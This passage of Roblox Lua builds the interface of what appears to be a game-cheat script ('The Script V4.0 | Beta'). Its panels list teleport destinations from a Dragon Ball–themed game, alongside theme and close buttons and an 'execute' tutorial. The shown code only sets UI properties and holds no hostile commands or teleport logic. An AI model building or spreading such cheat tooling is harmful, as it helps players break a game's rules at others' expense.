TeleportMain.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
TeleportMain.Selectable = true
TeleportMain.Size = UDim2.new(0, 461, 0, 456)
TeleportMain.Visible = false

Earth.Name = "Earth"
Earth.Parent = TeleportMain
Earth.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Earth.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Earth.BorderSizePixel = 4
Earth.Position = UDim2.new(0.0287371948, 0, 0.263939738, 0)
Earth.Size = UDim2.new(0, 200, 0, 50)
Earth.Font = Enum.Font.SourceSansBold
Earth.Text = "Earth"
Earth.TextColor3 = Color3.new(1, 1, 1)
Earth.TextScaled = true
Earth.TextSize = 14
Earth.TextWrapped = true

Bar9.Name = "Bar9"
Bar9.Parent = TeleportMain
Bar9.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar9.BorderSizePixel = 0
Bar9.Size = UDim2.new(0, 461, 0, 29)

Bar10.Name = "Bar10"
Bar10.Parent = TeleportMain
Bar10.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar10.BorderSizePixel = 0
Bar10.Position = UDim2.new(0, 0, 0.0635964945, 0)
Bar10.Size = UDim2.new(0, 461, 0, 6)

Text.Name = "Text"
Text.Parent = TeleportMain
Text.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Text.BorderSizePixel = 0
Text.Position = UDim2.new(0, 0, 0.00438596494, 0)
Text.Size = UDim2.new(0, 154, 0, 26)
Text.Font = Enum.Font.SourceSans
Text.Text = "The Script V4.0 | Beta"
Text.TextColor3 = Color3.new(1, 1, 1)
Text.TextScaled = true
Text.TextSize = 14
Text.TextWrapped = true

Bye.Name = "Bye"
Bye.Parent = TeleportMain
Bye.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bye.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bye.BorderSizePixel = 0
Bye.Position = UDim2.new(0.929305315, 0, 0.00759916054, 0)
Bye.Size = UDim2.new(0, 33, 0, 22)
Bye.Font = Enum.Font.SourceSansBold
Bye.Text = "X"
Bye.TextColor3 = Color3.new(1, 1, 1)
Bye.TextScaled = true
Bye.TextSize = 14
Bye.TextWrapped = true

WhereYouAre.Name = "WhereYouAre"
WhereYouAre.Parent = TeleportMain
WhereYouAre.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
WhereYouAre.BorderSizePixel = 0
WhereYouAre.Position = UDim2.new(0.247288495, 0, 0.116228074, 0)
WhereYouAre.Size = UDim2.new(0, 233, 0, 50)
WhereYouAre.Font = Enum.Font.SourceSans
WhereYouAre.Text = "Where are you?"
WhereYouAre.TextColor3 = Color3.new(1, 1, 1)
WhereYouAre.TextScaled = true
WhereYouAre.TextSize = 14
WhereYouAre.TextWrapped = true

Namek.Name = "Namek"
Namek.Parent = TeleportMain
Namek.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Namek.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Namek.BorderSizePixel = 4
Namek.Position = UDim2.new(0.53849864, 0, 0.263939738, 0)
Namek.Size = UDim2.new(0, 200, 0, 50)
Namek.Font = Enum.Font.SourceSansBold
Namek.Text = "Namek"
Namek.TextColor3 = Color3.new(1, 1, 1)
Namek.TextScaled = true
Namek.TextSize = 14
Namek.TextWrapped = true

Space.Name = "Space"
Space.Parent = TeleportMain
Space.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Space.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Space.BorderSizePixel = 4
Space.Position = UDim2.new(0.0287371948, 0, 0.478852034, 0)
Space.Size = UDim2.new(0, 200, 0, 50)
Space.Font = Enum.Font.SourceSansBold
Space.Text = "Space"
Space.TextColor3 = Color3.new(1, 1, 1)
Space.TextScaled = true
Space.TextSize = 14
Space.TextWrapped = true

Future.Name = "Future"
Future.Parent = TeleportMain
Future.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Future.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Future.BorderSizePixel = 4
Future.Position = UDim2.new(0.53849858, 0, 0.478852034, 0)
Future.Size = UDim2.new(0, 200, 0, 50)
Future.Font = Enum.Font.SourceSansBold
Future.Text = "Future"
Future.TextColor3 = Color3.new(1, 1, 1)
Future.TextScaled = true
Future.TextSize = 14
Future.TextWrapped = true

EarthTeleport.Name = "EarthTeleport"
EarthTeleport.Parent = TheGui
EarthTeleport.Active = true
EarthTeleport.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
EarthTeleport.Draggable = true
EarthTeleport.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
EarthTeleport.Selectable = true
EarthTeleport.Size = UDim2.new(0, 466, 0, 460)
EarthTeleport.Visible = false

Bar11.Name = "Bar11"
Bar11.Parent = EarthTeleport
Bar11.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar11.BorderSizePixel = 0
Bar11.Position = UDim2.new(0, 0, 0.00217391294, 0)
Bar11.Size = UDim2.new(0, 466, 0, 29)

Bar14.Name = "Bar14"
Bar14.Parent = EarthTeleport
Bar14.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar14.BorderSizePixel = 0
Bar14.Position = UDim2.new(-0.00214592274, 0, 0.0565217398, 0)
Bar14.Size = UDim2.new(0, 467, 0, 6)

Oof.Name = "Oof"
Oof.Parent = EarthTeleport
Oof.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Oof.BorderSizePixel = 0
Oof.Position = UDim2.new(0, 0, 0.00217391294, 0)
Oof.Size = UDim2.new(0, 176, 0, 22)
Oof.Font = Enum.Font.SourceSans
Oof.Text = "The Script V4.5 | Beta"
Oof.TextColor3 = Color3.new(1, 1, 1)
Oof.TextScaled = true
Oof.TextSize = 14
Oof.TextWrapped = true

WestCity.Name = "WestCity"
WestCity.Parent = EarthTeleport
WestCity.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
WestCity.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
WestCity.BorderSizePixel = 4
WestCity.Position = UDim2.new(0.0274850354, 0, 0.191304356, 0)
WestCity.Size = UDim2.new(0, 200, 0, 50)
WestCity.Font = Enum.Font.SourceSansBold
WestCity.Text = "West City"
WestCity.TextColor3 = Color3.new(1, 1, 1)
WestCity.TextScaled = true
WestCity.TextSize = 14
WestCity.TextWrapped = true

Exat.Name = "Exat"
Exat.Parent = EarthTeleport
Exat.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Exat.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Exat.BorderSizePixel = 0
Exat.Position = UDim2.new(0.929893434, 0, 0.00649634004, 0)
Exat.Size = UDim2.new(0, 33, 0, 22)
Exat.Font = Enum.Font.SourceSansBold
Exat.Text = "X"
Exat.TextColor3 = Color3.new(1, 1, 1)
Exat.TextScaled = true
Exat.TextSize = 14
Exat.TextWrapped = true

Tuxt.Name = "Tuxt"
Tuxt.Parent = EarthTeleport
Tuxt.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Tuxt.BorderSizePixel = 0
Tuxt.Position = UDim2.new(0.180257514, 0, 0.0695652217, 0)
Tuxt.Size = UDim2.new(0, 297, 0, 50)
Tuxt.Font = Enum.Font.SourceSans
Tuxt.Text = "Where do you want to teleport?"
Tuxt.TextColor3 = Color3.new(1, 1, 1)
Tuxt.TextScaled = true
Tuxt.TextSize = 14
Tuxt.TextWrapped = true

CentralCity.Name = "CentralCity"
CentralCity.Parent = EarthTeleport
CentralCity.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
CentralCity.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
CentralCity.BorderSizePixel = 4
CentralCity.Position = UDim2.new(0.54036057, 0, 0.191304356, 0)
CentralCity.Size = UDim2.new(0, 200, 0, 50)
CentralCity.Font = Enum.Font.SourceSansBold
CentralCity.Text = "Central City"
CentralCity.TextColor3 = Color3.new(1, 1, 1)
CentralCity.TextScaled = true
CentralCity.TextSize = 14
CentralCity.TextWrapped = true

SatanCity.Name = "SatanCity"
SatanCity.Parent = EarthTeleport
SatanCity.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
SatanCity.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
SatanCity.BorderSizePixel = 4
SatanCity.Position = UDim2.new(0.0274850354, 0, 0.354347825, 0)
SatanCity.Size = UDim2.new(0, 200, 0, 50)
SatanCity.Font = Enum.Font.SourceSansBold
SatanCity.Text = "Satan City"
SatanCity.TextColor3 = Color3.new(1, 1, 1)
SatanCity.TextScaled = true
SatanCity.TextSize = 14
SatanCity.TextWrapped = true

HTC.Name = "HTC"
HTC.Parent = EarthTeleport
HTC.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
HTC.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
HTC.BorderSizePixel = 4
HTC.Position = UDim2.new(0.54036057, 0, 0.354347825, 0)
HTC.Size = UDim2.new(0, 200, 0, 50)
HTC.Font = Enum.Font.SourceSansBold
HTC.Text = "Hyperbolic Time Chamber"
HTC.TextColor3 = Color3.new(1, 1, 1)
HTC.TextScaled = true
HTC.TextSize = 14
HTC.TextWrapped = true

Tournament.Name = "Tournament"
Tournament.Parent = EarthTeleport
Tournament.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Tournament.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Tournament.BorderSizePixel = 4
Tournament.Position = UDim2.new(0.027485013, 0, 0.515217364, 0)
Tournament.Size = UDim2.new(0, 200, 0, 50)
Tournament.Font = Enum.Font.SourceSansBold
Tournament.Text = "Tournament"
Tournament.TextColor3 = Color3.new(1, 1, 1)
Tournament.TextScaled = true
Tournament.TextSize = 14
Tournament.TextWrapped = true

Namak.Name = "Namak"
Namak.Parent = EarthTeleport
Namak.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Namak.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Namak.BorderSizePixel = 4
Namak.Position = UDim2.new(0.54036057, 0, 0.515217364, 0)
Namak.Size = UDim2.new(0, 200, 0, 50)
Namak.Font = Enum.Font.SourceSansBold
Namak.Text = "Namek"
Namak.TextColor3 = Color3.new(1, 1, 1)
Namak.TextScaled = true
Namak.TextSize = 14
Namak.TextWrapped = true

Spece.Name = "Spece"
Spece.Parent = EarthTeleport
Spece.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Spece.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Spece.BorderSizePixel = 4
Spece.Position = UDim2.new(0.027485013, 0, 0.684782565, 0)
Spece.Size = UDim2.new(0, 200, 0, 50)
Spece.Font = Enum.Font.SourceSansBold
Spece.Text = "Space"
Spece.TextColor3 = Color3.new(1, 1, 1)
Spece.TextScaled = true
Spece.TextSize = 14
Spece.TextWrapped = true

Futare.Name = "Futare"
Futare.Parent = EarthTeleport
Futare.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Futare.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Futare.BorderSizePixel = 4
Futare.Position = UDim2.new(0.539750338, 0, 0.684350669, 0)
Futare.Size = UDim2.new(0, 200, 0, 50)
Futare.Font = Enum.Font.SourceSansBold
Futare.Text = "Future"
Futare.TextColor3 = Color3.new(1, 1, 1)
Futare.TextScaled = true
Futare.TextSize = 14
Futare.TextWrapped = true

ForTheTeleportTutorial.Name = "ForTheTeleportTutorial"
ForTheTeleportTutorial.Parent = TheGui
ForTheTeleportTutorial.Active = true
ForTheTeleportTutorial.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
ForTheTeleportTutorial.BorderSizePixel = 0
ForTheTeleportTutorial.Draggable = true
ForTheTeleportTutorial.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
ForTheTeleportTutorial.Selectable = true
ForTheTeleportTutorial.Size = UDim2.new(0, 470, 0, 454)
ForTheTeleportTutorial.Visible = false

Bar12.Name = "Bar12"
Bar12.Parent = ForTheTeleportTutorial
Bar12.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar12.BorderSizePixel = 0
Bar12.Size = UDim2.new(0, 470, 0, 40)

Bar13.Name = "Bar13"
Bar13.Parent = ForTheTeleportTutorial
Bar13.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar13.BorderSizePixel = 0
Bar13.Position = UDim2.new(0, 0, 0.0881057233, 0)
Bar13.Size = UDim2.new(0, 470, 0, 6)

Bai.Name = "Bai"
Bai.Parent = ForTheTeleportTutorial
Bai.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bai.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bai.BorderSizePixel = 0
Bai.Position = UDim2.new(0.928848386, 0, 0.0307220854, 0)
Bai.Size = UDim2.new(0, 33, 0, 22)
Bai.Font = Enum.Font.SourceSansBold
Bai.Text = "X"
Bai.TextColor3 = Color3.new(1, 1, 1)
Bai.TextScaled = true
Bai.TextSize = 14
Bai.TextWrapped = true

Tele.Name = "Tele"
Tele.Parent = ForTheTeleportTutorial
Tele.Active = true
Tele.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Tele.BorderSizePixel = 0
Tele.Position = UDim2.new(0.012765957, 0, 0.101321578, 0)
Tele.Size = UDim2.new(0, 464, 0, 408)
Tele.Font = Enum.Font.SourceSans
Tele.Text = "1. Click On Execute Then After Click On Teleport To Area\n2. Click On The Teleport Area After You Execute The Script.\n3. Click On Where You Are, If You Are On Earth, Click On Earth\n4. Click On Where You'd Like To Teleport\n5. Done, Enjoy!"
Tele.TextColor3 = Color3.new(1, 1, 0)
Tele.TextScaled = true
Tele.TextSize = 14
Tele.TextWrapped = true

F.Name = "F"
F.Parent = ForTheTeleportTutorial
F.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
F.BorderSizePixel = 0
F.Position = UDim2.new(0, 0, 0.0149999997, 0)
F.Size = UDim2.new(0, 165, 0, 26)
F.Font = Enum.Font.SourceSans
F.Text = "The Script V4.0 | Beta"
F.TextColor3 = Color3.new(1, 1, 1)
F.TextScaled = true
F.TextSize = 14
F.TextWrapped = true

Open.Name = "Open"
Open.Parent = TheGui
Open.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Open.BorderSizePixel = 5
Open.Position = UDim2.new(0.00473933667, 0, 0.772120178, 0)
Open.Size = UDim2.new(0, 200, 0, 61)
Open.Font = Enum.Font.SourceSans
Open.Text = "Open"
Open.TextColor3 = Color3.new(1, 1, 1)
Open.TextScaled = true
Open.TextSize = 14
Open.TextWrapped = true

Close.Name = "Close"
Close.Parent = TheGui
Close.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Close.BorderSizePixel = 5
Close.Position = UDim2.new(0.00499999989, 0, 0.772000015, 0)
Close.Size = UDim2.new(0, 200, 0, 61)
Close.Visible = false
Close.Font = Enum.Font.SourceSans
Close.Text = "Close"
Close.TextColor3 = Color3.new(1, 1, 1)
Close.TextScaled = true
Close.TextSize = 14
Close.TextWrapped = true

ThemesMain.Name = "ThemesMain"
ThemesMain.Parent = TheGui
ThemesMain.Active = true
ThemesMain.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
ThemesMain.Draggable = true
ThemesMain.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
ThemesMain.Selectable = true
ThemesMain.Size = UDim2.new(0, 466, 0, 460)
ThemesMain.Visible = false

Bar15.Name = "Bar15"
Bar15.Parent = ThemesMain
Bar15.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar15.BorderSizePixel = 0
Bar15.Position = UDim2.new(0, 0, 0.00217391294, 0)
Bar15.Size = UDim2.new(0, 466, 0, 29)

Bar16.Name = "Bar16"
Bar16.Parent = ThemesMain
Bar16.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar16.BorderSizePixel = 0
Bar16.Position = UDim2.new(-0.00214592274, 0, 0.0565217398, 0)
Bar16.Size = UDim2.new(0, 467, 0, 6)

Aaf.Name = "Aaf"
Aaf.Parent = ThemesMain
Aaf.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Aaf.BorderSizePixel = 0
Aaf.Position = UDim2.new(0, 0, 0.00217391294, 0)
Aaf.Size = UDim2.new(0, 154, 0, 25)
Aaf.Font = Enum.Font.SourceSans
Aaf.Text = "The Script V4.0 | Beta"
Aaf.TextColor3 = Color3.new(1, 1, 1)
Aaf.TextScaled = true
Aaf.TextSize = 14
Aaf.TextWrapped = true

Tixt.Name = "Tixt"
Tixt.Parent = ThemesMain
Tixt.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Tixt.BorderSizePixel = 0
Tixt.Position = UDim2.new(0.180257514, 0, 0.0695652217, 0)
Tixt.Size = UDim2.new(0, 297, 0, 50)
Tixt.Font = Enum.Font.SourceSans
Tixt.Text = "What theme do you want put?"
Tixt.TextColor3 = Color3.new(1, 1, 1)
Tixt.TextScaled = true
Tixt.TextSize = 14
Tixt.TextWrapped = true

BlackTheme.Name = "BlackTheme"
BlackTheme.Parent = ThemesMain
BlackTheme.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
BlackTheme.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
BlackTheme.BorderSizePixel = 4
BlackTheme.Position = UDim2.new(0.0296309479, 0, 0.215217397, 0)
BlackTheme.Size = UDim2.new(0, 200, 0, 50)
BlackTheme.Font = Enum.Font.SourceSansBold
BlackTheme.Text = "Black Theme"
BlackTheme.TextColor3 = Color3.new(1, 1, 1)
BlackTheme.TextScaled = true
BlackTheme.TextSize = 14
BlackTheme.TextWrapped = true

WhiteTheme.Name = "WhiteTheme"
WhiteTheme.Parent = ThemesMain
WhiteTheme.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
WhiteTheme.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
WhiteTheme.BorderSizePixel = 4
WhiteTheme.Position = UDim2.new(0.548944235, 0, 0.215217382, 0)
WhiteTheme.Size = UDim2.new(0, 200, 0, 50)
WhiteTheme.Font = Enum.Font.SourceSansBold
WhiteTheme.Text = "White Theme"
WhiteTheme.TextColor3 = Color3.new(1, 1, 1)
WhiteTheme.TextScaled = true
WhiteTheme.TextSize = 14
WhiteTheme.TextWrapped = true

Die.Name = "Die"
Die.Parent = ThemesMain
Die.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Die.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Die.BorderSizePixel = 0
Die.Position = UDim2.new(0.929305315, 0, 0.00759916054, 0)
Die.Size = UDim2.new(0, 33, 0, 22)
Die.Font = Enum.Font.SourceSansBold
Die.Text = "X"
Die.TextColor3 = Color3.new(1, 1, 1)
Die.TextScaled = true
Die.TextSize = 14
Die.TextWrapped = true

NamekTeleport.Name = "NamekTeleport"
NamekTeleport.Parent = TheGui
NamekTeleport.Active = true
NamekTeleport.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
NamekTeleport.Draggable = true
NamekTeleport.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
NamekTeleport.Selectable = true
NamekTeleport.Size = UDim2.new(0, 466, 0, 460)
NamekTeleport.Visible = false

Bar17.Name = "Bar17"
Bar17.Parent = NamekTeleport
Bar17.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar17.BorderSizePixel = 0
Bar17.Position = UDim2.new(0, 0, 0.00217391294, 0)
Bar17.Size = UDim2.new(0, 466, 0, 29)

Bar18.Name = "Bar18"
Bar18.Parent = NamekTeleport
Bar18.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar18.BorderSizePixel = 0
Bar18.Position = UDim2.new(-0.00214592274, 0, 0.0565217398, 0)
Bar18.Size = UDim2.new(0, 467, 0, 6)

Iif.Name = "Iif"
Iif.Parent = NamekTeleport
Iif.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Iif.BorderSizePixel = 0
Iif.Position = UDim2.new(0, 0, 0.00217391294, 0)
Iif.Size = UDim2.new(0, 165, 0, 24)
Iif.Font = Enum.Font.SourceSans
Iif.Text = "The Script V4.0 | Beta"
Iif.TextColor3 = Color3.new(1, 1, 1)
Iif.TextScaled = true
Iif.TextSize = 14
Iif.TextWrapped = true

Frieza.Name = "Frieza"
Frieza.Parent = NamekTeleport
Frieza.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Frieza.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Frieza.BorderSizePixel = 4
Frieza.Position = UDim2.new(0.0274850354, 0, 0.191304356, 0)
Frieza.Size = UDim2.new(0, 200, 0, 50)
Frieza.Font = Enum.Font.SourceSansBold
Frieza.Text = "Frieza"
Frieza.TextColor3 = Color3.new(1, 1, 1)
Frieza.TextScaled = true
Frieza.TextSize = 14
Frieza.TextWrapped = true

Exot.Name = "Exot"
Exot.Parent = NamekTeleport
Exot.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Exot.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Exot.BorderSizePixel = 0
Exot.Position = UDim2.new(0.929893434, 0, 0.00649634004, 0)
Exot.Size = UDim2.new(0, 33, 0, 22)
Exot.Font = Enum.Font.SourceSansBold
Exot.Text = "X"
Exot.TextColor3 = Color3.new(1, 1, 1)
Exot.TextScaled = true
Exot.TextSize = 14
Exot.TextWrapped = true

Texto.Name = "Texto"
Texto.Parent = NamekTeleport
Texto.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Texto.BorderSizePixel = 0
Texto.Position = UDim2.new(0.180257514, 0, 0.0695652217, 0)
Texto.Size = UDim2.new(0, 297, 0, 50)
Texto.Font = Enum.Font.SourceSans
Texto.Text = "Where do you want to teleport?"
Texto.TextColor3 = Color3.new(1, 1, 1)
Texto.TextScaled = true
Texto.TextSize = 14
Texto.TextWrapped = true

SecretArea.Name = "SecretArea"
SecretArea.Parent = NamekTeleport
SecretArea.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
SecretArea.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
SecretArea.BorderSizePixel = 4
SecretArea.Position = UDim2.new(0.54036057, 0, 0.191304356, 0)
SecretArea.Size = UDim2.new(0, 200, 0, 50)
SecretArea.Font = Enum.Font.SourceSansBold
SecretArea.Text = "Secret Area"
SecretArea.TextColor3 = Color3.new(1, 1, 1)
SecretArea.TextScaled = true
SecretArea.TextSize = 14
SecretArea.TextWrapped = true

Guldos.Name = "Guldos"
Guldos.Parent = NamekTeleport
Guldos.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Guldos.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Guldos.BorderSizePixel = 4
Guldos.Position = UDim2.new(0.0274850354, 0, 0.354347825, 0)
Guldos.Size = UDim2.new(0, 200, 0, 50)
Guldos.Font = Enum.Font.SourceSansBold
Guldos.Text = "Guldos"
Guldos.TextColor3 = Color3.new(1, 1, 1)
Guldos.TextScaled = true
Guldos.TextSize = 14
Guldos.TextWrapped = true

Captain.Name = "Captain"
Captain.Parent = NamekTeleport
Captain.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Captain.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Captain.BorderSizePixel = 4
Captain.Position = UDim2.new(0.54036057, 0, 0.354347825, 0)
Captain.Size = UDim2.new(0, 200, 0, 50)
Captain.Font = Enum.Font.SourceSansBold
Captain.Text = "Captain Ginyu"
Captain.TextColor3 = Color3.new(1, 1, 1)
Captain.TextScaled = true
Captain.TextSize = 14
Captain.TextWrapped = true

Jeice.Name = "Jeice"
Jeice.Parent = NamekTeleport
Jeice.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Jeice.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Jeice.BorderSizePixel = 4
Jeice.Position = UDim2.new(0.027485013, 0, 0.515217364, 0)
Jeice.Size = UDim2.new(0, 200, 0, 50)
Jeice.Font = Enum.Font.SourceSansBold
Jeice.Text = "Jeice"
Jeice.TextColor3 = Color3.new(1, 1, 1)
Jeice.TextScaled = true
Jeice.TextSize = 14
Jeice.TextWrapped = true

Recoome.Name = "Recoome"
Recoome.Parent = NamekTeleport
Recoome.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Recoome.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Recoome.BorderSizePixel = 4
Recoome.Position = UDim2.new(0.54036057, 0, 0.515217364, 0)
Recoome.Size = UDim2.new(0, 200, 0, 50)
Recoome.Font = Enum.Font.SourceSansBold
Recoome.Text = "Recoome"
Recoome.TextColor3 = Color3.new(1, 1, 1)
Recoome.TextScaled = true
Recoome.TextSize = 14
Recoome.TextWrapped = true

Universal.Name = "Universal"
Universal.Parent = NamekTeleport
Universal.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Universal.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Universal.BorderSizePixel = 4
Universal.Position = UDim2.new(0.261390597, 0, 0.843046367, 0)
Universal.Size = UDim2.new(0, 200, 0, 50)
Universal.Font = Enum.Font.SourceSansBold
Universal.Text = "Namek Universal Champion"
Universal.TextColor3 = Color3.new(1, 1, 1)
Universal.TextScaled = true
Universal.TextSize = 14
Universal.TextWrapped = true

Terra.Name = "Terra"
Terra.Parent = NamekTeleport
Terra.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Terra.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Terra.BorderSizePixel = 4
Terra.Position = UDim2.new(0.539750338, 0, 0.684350669, 0)
Terra.Size = UDim2.new(0, 200, 0, 50)
Terra.Font = Enum.Font.SourceSansBold
Terra.Text = "Earth"
Terra.TextColor3 = Color3.new(1, 1, 1)
Terra.TextScaled = true
Terra.TextSize = 14
Terra.TextWrapped = true

Burter.Name = "Burter"
Burter.Parent = NamekTeleport
Burter.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Burter.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Burter.BorderSizePixel = 4
Burter.Position = UDim2.new(0.0274850428, 0, 0.68435061, 0)
Burter.Size = UDim2.new(0, 200, 0, 50)
Burter.Font = Enum.Font.SourceSansBold
Burter.Text = "Burter"
Burter.TextColor3 = Color3.new(1, 1, 1)
Burter.TextScaled = true
Burter.TextSize = 14
Burter.TextWrapped = true

Sure.Name = "Sure"
Sure.Parent = TheGui
Sure.Active = true
Sure.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Sure.Draggable = true
Sure.Position = UDim2.new(0.361999989, 0, 0.115000002, 0)
Sure.Selectable = true
Sure.Size = UDim2.new(0, 348, 0, 313)
Sure.Visible = false

Are.Name = "Are"
Are.Parent = Sure
Are.BackgroundColor3 = Color3.new(0.117647, 0.117647, 0.117647)
Are.BorderSizePixel = 0
Are.Position = UDim2.new(0.106321834, 0, 0.215654969, 0)
Are.Size = UDim2.new(0, 274, 0, 50)
Are.Font = Enum.Font.SourceSans
Are.Text = "Are You Sure You Want Destroy The Gui?"
Are.TextColor3 = Color3.new(1, 1, 1)
Are.TextScaled = true
Are.TextSize = 14
Are.TextWrapped = true

Yes.Name = "Yes"
Yes.Parent = Sure
Yes.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Yes.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Yes.BorderSizePixel = 4
Yes.Position = UDim2.new(0.0344827585, 0, 0.675324142, 0)
Yes.Size = UDim2.new(0, 150, 0, 61)
Yes.Font = Enum.Font.SourceSans
Yes.Text = "Yes"
Yes.TextColor3 = Color3.new(1, 1, 1)
Yes.TextScaled = true
Yes.TextSize = 14
Yes.TextWrapped = true

No.Name = "No"
No.Parent = Sure
No.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
No.BorderColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
No.BorderSizePixel = 4
No.Position = UDim2.new(0.547652125, 0, 0.675324142, 0)
No.Size = UDim2.new(0, 142, 0, 61)
No.Font = Enum.Font.SourceSans
No.Text = "No"
No.TextColor3 = Color3.new(1, 1, 1)
No.TextScaled = true
No.TextSize = 14
No.TextWrapped = true

Bar19.Name = "Bar19"
Bar19.Parent = Sure
Bar19.BackgroundColor3 = Color3.new(0.0588235, 0.0588235, 0.0588235)
Bar19.BorderSizePixel = 0
Bar19.Position = UDim2.new(-0.00418096781, 0, 6.39911741e-05, 0)
Bar19.Size = UDim2.new(0, 349, 0, 29)

Bar20.Name = "Bar20"
Bar20.Parent = Sure
Bar20.BackgroundColor3 = Color3.new(0.0392157, 0.0392157, 0.0392157)
Bar20.BorderSizePixel = 0
Bar20.Position = UDim2.new(-0.00406857673, 0, 0.0788242519, 0)
Bar20.Size = UDim2.new(0, 349, 0, 6)

kms.Name = "kms"
kms.Parent = Sure
